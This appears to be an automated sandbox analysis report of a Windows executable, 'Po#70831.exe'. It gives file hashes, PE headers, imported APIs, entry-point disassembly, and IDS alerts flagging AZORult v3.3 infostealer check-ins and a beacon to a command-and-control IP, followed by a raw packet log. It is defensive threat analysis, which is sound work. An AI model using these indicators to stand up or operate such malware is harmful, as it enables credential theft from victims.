                                    Preview:EA06......#.:Mbg4.Lj.>F..4.N&Ty...Z.L...,.d.LkU9.V.4....2....7..$.I...:..<U{......+u.\FU!.L..Y.b.2.M.3..J.9......z.W.wX5fe...%.`..`...gc..&1j.._.E.@.:.S;....mA...8K...8...Ze".2=. ..5S..@....7.K.\..uz4.....%[.L..,..F..>..-.UJo..W.....Q.....{...Z...ty.RP.2v........U'.(..-..2d.P...Y..`.&.....F&sL.....d.....3[....d........O*.L.U....T.M+..&^.._....[E.cT..&t(-$.d.T.u.8.....d|.).2..'...+@.8..d|..(..8.g.J.H.T.>7[.......d.W.p*.n.p..&..'..2qmRH..gO.H.s..r. ..%.~v.Y....I..)G.L&.....S.T....R.'..%.?.....|..). .g>.....E'.+]...E.X..N..]+...No...*..4".(.Nd\.3...n>.x...v..~...+-r.t.Z...;....|...............s:[.{....3..S....2.....s..0Zk...s.v1zx.S.p.v>.....y.s>{....s.q.{K.....r|..[...np..<....nq..t..u.n.Z.7/u.l.[..;...n~[;...r.t.:[.o...w....o'..w~\.Mo5......._...o.x......r........Y.~2..&[;\nf.M..E...=:..._ =...#.......$....@.&8.P.Lw.@......1..2cO..d.@....&....m.S.=............7...NM2.a.P..O....zu}.....V .n....Dp....w_.Q#}.eZ...Szr=.:...i..m.Ry..|.0...s..s...b._.}.q.

                                    C:\Users\user\AppData\Local\Temp\aut2BE3.tmp

                                    Download File
                                    Process:C:\Users\user\Desktop\Po#70831.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):43598
                                    Entropy (8bit):7.822811678708412
                                    Encrypted:false
                                    SSDEEP:768:cUW2SKIDRcUkG+LA8wPPWmYPd6k9YoDWsftlqlqAv5srG9+7UY:ctDKeTH+s1Pp29YnAAv5b+J
                                    MD5:2D57BB3FA3D1CB384E9F45F90AE0EB3A
                                    SHA1:3E7314DAEC63E9384C22C938E6CCD3AC9DEFD8DE
                                    SHA-256:20129498AE8E3CCA8065F601A1FDDC7CFDFF1B7FD917ED2AB5DCE599901919F5
                                    SHA-512:C61535E6060A1CF08C9C29D39A3B25BB4D3A61F6FF809D1D47C282B75F3420AB3BD9272459D0CEB2618FE59CE0ED62CC523A3CA713A3623845FF34636DD8E1CF
                                    Malicious:false
                                    Preview:EA06..P...*3y.^g5.L.I..6.Q&.Zl.gK..).9.Jm5.M.u....$.*S9..1C..(.9..g0.L...3..fsz..eC..*.9.Fm2.L.....`.ZS.....mD..g.9..3.QfsZ...4..T..3.SfsZ..aN.*f...:.3.U&sjL.mH.6..9.:m4..).9.^m2..5...3.P.......U.s...l.,Pfs.0..5.L....3.S..*P.K6..)...@....+S9.Vg6..6T.....L. ."m1.M.TY..3.V@9....d..o@...3.T&s...sO..&.Jd.qK.L.(...b........g0.L..0.h........4...4...3............9.&g3...(...r+ (....L..I..3.TfsZ..r...Q....g3...`........T..*..".*S9.&g4.M....Fg2..QUi......d.U...U ..P.C....B..j.0h...D...Jx..I... ........T...g5.M..Jd.eT..f............:U.sj....l.sJ.....-'...Fm1.T)Si.D..T@.:...S@....g9..( ..Rm1...T..x....+@R..3..W.....4..U....6..cb...R@.*...Q..&s......n*.;..6.R&.j|.mK.M.Si.$."..).9...Z..m.0... ..l@..Zg9.L.^ ..R.?.s`..mP....j8.a3....O%P............D)`...p...5... .B.M....X.<...@.e.m3..5d.!...d...H@.....6....9.....o......P..*.....S.\`.2.....Sj..4........g4..]..d.v..(..%Bm2..(s9.fm5...T@.....Q.g.:....').9.D.E..&.jh..X...@1..3....p......!@....T..`....Rf.@5@.....@.eT.v..

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):6.537206823032587
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:Po#70831.exe
                                    File size:1'295'872 bytes
                                    MD5:bde0b7ff5003da14df7675564d5a8f6a
                                    SHA1:e72691a96a386c72392375969f0426361e167d3b
                                    SHA256:af44fccdfe3d6e7f65283d47f4a121bd70000dbcf1d8d91aead1c124cd808554
                                    SHA512:f1bdee98318083a64e6ad820e630cd9a39d6017eff13c7d5be86c66bab5f388111a48fbb1ffe2198ab6e915d4d1431ba06373404885cbde5ba186dfb78ac74cf
                                    SSDEEP:24576:LqDEvCTbMWu7rQYlBQcBiT6rprG8a8cqly1Cs6wf:LTvC/MTQYxsWR7a8cqls
                                    TLSH:10559E0273819022FFD7B5324F56E63157B86D2A0123A51F13F81D7BBABC1A3563E662
                                    File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

                                    File Icon

                                    Icon Hash:0148d03032d9cc13

                                    Static PE Info

                                    General

                                    Entrypoint:0x420577
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x66C6ED5E [Thu Aug 22 07:48:46 2024 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:5
                                    OS Version Minor:1
                                    File Version Major:5
                                    File Version Minor:1
                                    Subsystem Version Major:5
                                    Subsystem Version Minor:1
                                    Import Hash:948cc502fe9226992dce9417f952fce3

                                    Entrypoint Preview

                                    Instruction
                                    call 00007FC99CC06293h
                                    jmp 00007FC99CC05B9Fh
                                    push ebp
                                    mov ebp, esp
                                    push esi
                                    push dword ptr [ebp+08h]
                                    mov esi, ecx
                                    call 00007FC99CC05D7Dh
                                    mov dword ptr [esi], 0049FDF0h
                                    mov eax, esi
                                    pop esi
                                    pop ebp
                                    retn 0004h
                                    and dword ptr [ecx+04h], 00000000h
                                    mov eax, ecx
                                    and dword ptr [ecx+08h], 00000000h
                                    mov dword ptr [ecx+04h], 0049FDF8h
                                    mov dword ptr [ecx], 0049FDF0h
                                    ret
                                    push ebp
                                    mov ebp, esp
                                    push esi
                                    push dword ptr [ebp+08h]
                                    mov esi, ecx
                                    call 00007FC99CC05D4Ah
                                    mov dword ptr [esi], 0049FE0Ch
                                    mov eax, esi
                                    pop esi
                                    pop ebp
                                    retn 0004h
                                    and dword ptr [ecx+04h], 00000000h
                                    mov eax, ecx
                                    and dword ptr [ecx+08h], 00000000h
                                    mov dword ptr [ecx+04h], 0049FE14h
                                    mov dword ptr [ecx], 0049FE0Ch
                                    ret
                                    push ebp
                                    mov ebp, esp
                                    push esi
                                    mov esi, ecx
                                    lea eax, dword ptr [esi+04h]
                                    mov dword ptr [esi], 0049FDD0h
                                    and dword ptr [eax], 00000000h
                                    and dword ptr [eax+04h], 00000000h
                                    push eax
                                    mov eax, dword ptr [ebp+08h]
                                    add eax, 04h
                                    push eax
                                    call 00007FC99CC0893Dh
                                    pop ecx
                                    pop ecx
                                    mov eax, esi
                                    pop esi
                                    pop ebp
                                    retn 0004h
                                    lea eax, dword ptr [ecx+04h]
                                    mov dword ptr [ecx], 0049FDD0h
                                    push eax
                                    call 00007FC99CC08988h
                                    pop ecx
                                    ret
                                    push ebp
                                    mov ebp, esp
                                    push esi
                                    mov esi, ecx
                                    lea eax, dword ptr [esi+04h]
                                    mov dword ptr [esi], 0049FDD0h
                                    push eax
                                    call 00007FC99CC08971h
                                    test byte ptr [ebp+08h], 00000001h
                                    pop ecx

                                    Rich Headers

                                    Programming Language:
                                    • [ C ] VS2008 SP1 build 30729
                                    • [IMP] VS2008 SP1 build 30729

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000x65b68.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x13a0000x7594.reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .rsrc0xd40000x65b680x65c00263c238dbd516afef7442c3765e4a28aFalse0.6125014396498771data6.036926432496404IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc0x13a0000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                    Resources

                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    RT_ICON0xd46080x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                    RT_ICON0xd47300x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                    RT_ICON0xd48580x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                    RT_ICON0xd49800x2fcbPNG image data, 512 x 512, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9289742541888026
                                    RT_ICON0xd794c0x1530PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.971976401179941
                                    RT_ICON0xd8e7c0x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishGreat Britain0.04035549509050041
                                    RT_ICON0xe96a40x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishGreat Britain0.05344755097750683
                                    RT_ICON0xf2b4c0x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishGreat Britain0.06903881700554529
                                    RT_ICON0xf7fd40x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishGreat Britain0.06672177609825225
                                    RT_ICON0xfc1fc0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.09647302904564316
                                    RT_ICON0xfe7a40x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.11303939962476547
                                    RT_ICON0xff84c0x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishGreat Britain0.16024590163934427
                                    RT_ICON0x1001d40x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.18882978723404256
                                    RT_MENU0x10063c0x50dataEnglishGreat Britain0.9
                                    RT_STRING0x10068c0x594dataEnglishGreat Britain0.3333333333333333
                                    RT_STRING0x100c200x68adataEnglishGreat Britain0.2735961768219833
                                    RT_STRING0x1012ac0x490dataEnglishGreat Britain0.3715753424657534
                                    RT_STRING0x10173c0x5fcdataEnglishGreat Britain0.3087467362924282
                                    RT_STRING0x101d380x65cdataEnglishGreat Britain0.34336609336609336
                                    RT_STRING0x1023940x466dataEnglishGreat Britain0.3605683836589698
                                    RT_STRING0x1027fc0x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                    RT_RCDATA0x1029540x36c76data1.000338720172569
                                    RT_GROUP_ICON0x1395cc0x92dataEnglishGreat Britain0.7054794520547946
                                    RT_GROUP_ICON0x1396600x14dataEnglishGreat Britain1.25
                                    RT_GROUP_ICON0x1396740x14dataEnglishGreat Britain1.15
                                    RT_GROUP_ICON0x1396880x14dataEnglishGreat Britain1.25
                                    RT_VERSION0x13969c0xdcdataEnglishGreat Britain0.6181818181818182
                                    RT_MANIFEST0x1397780x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                    Imports

                                    DLLImport
                                    WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                    VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                    WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                    COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                    MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                    WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                    PSAPI.DLLGetProcessMemoryInfo
                                    IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                    USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                    UxTheme.dllIsThemeActive
                                    KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
                                    USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                                    GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                                    COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                    ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                                    SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                    ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                    OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

                                    Possible Origin

                                    Language of compilation systemCountry where language is spokenMap
                                    EnglishGreat Britain

                                    Network Behavior

                                    Suricata IDS Alerts

                                    TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                                    2024-08-29T12:02:33.732607+0200TCP2029136ET MALWARE AZORult v3.3 Server Response M118049717172.67.128.117192.168.2.6
                                    2024-08-29T12:02:42.498882+0200TCP2029467ET MALWARE Win32/AZORult V3.3 Client Checkin M1414971880192.168.2.6172.67.128.117
                                    2024-08-29T12:02:33.484339+0200TCP2029467ET MALWARE Win32/AZORult V3.3 Client Checkin M1414971780192.168.2.6172.67.128.117
                                    2024-08-29T12:02:33.484339+0200TCP2810276ETPRO MALWARE AZORult CnC Beacon M114971780192.168.2.6172.67.128.117

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Aug 29, 2024 12:02:31.730758905 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:31.735678911 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:31.735768080 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:31.797943115 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:31.802861929 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.484227896 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.484261036 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.484272957 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.484338999 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.484385967 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.484395027 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.484405994 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.484416008 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.484428883 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.484436035 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.484464884 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.484641075 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.484652042 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.484666109 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.484688044 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.484699965 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.489465952 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.489489079 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.489636898 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.574851036 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.574889898 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.574903011 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.574908018 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.574915886 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.574934006 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.574959993 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.729540110 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.729557991 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.729569912 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.729582071 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.729662895 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.729665995 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.729722023 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.729909897 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.729954958 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.729964972 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.729976892 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.730000019 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.730004072 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.730019093 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.730021000 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.730042934 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.730045080 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.730063915 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.730093002 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.730129957 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.730182886 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.730834007 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.730869055 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.730879068 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.730880976 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.730911970 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.730920076 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.730921030 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.730932951 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.730966091 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.731724977 CEST8049717172.67.128.117192.168.2.6
